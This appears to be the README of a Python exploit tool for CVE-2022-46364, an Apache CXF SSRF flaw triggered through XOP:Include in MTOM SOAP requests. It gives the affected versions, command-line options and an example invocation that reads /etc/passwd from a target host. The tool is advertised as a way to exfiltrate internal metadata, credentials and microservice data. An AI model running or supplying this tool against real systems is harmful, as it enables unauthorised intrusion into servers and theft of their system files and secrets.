
Python exploit for CVE-2022-46364 (Apache CXF SSRF via MTOM XOP:Include). Sends crafted SOAP requests to exfiltrate internal metadata, credentials, and microservice data from vulnerable endpoints.
Apache CXF SSRF via MTOM XOP:Include | CVSS 9.8 CRITICAL
Apache CXF < 3.5.5 / < 3.4.10 allows Server-Side Request Forgery through unvalidated XOP:Include href attributes in MTOM-encoded SOAP requests.
python3 exploit.py -t <TARGET_URL> -s <SSRF_URL> -d <DOMAIN>
-t, --target - Vulnerable CXF SOAP endpoint (required)-s, --ssrf-url - Internal URL to exfiltrate (required)-d, --domain - Target domain (default: localhost)--plain-soap - Use plain SOAP instead of MTOM# Read /etc/passwd
python3 exploit.py -t http://target.com:8080/employeeservice -s file:///etc/passwd -d target.com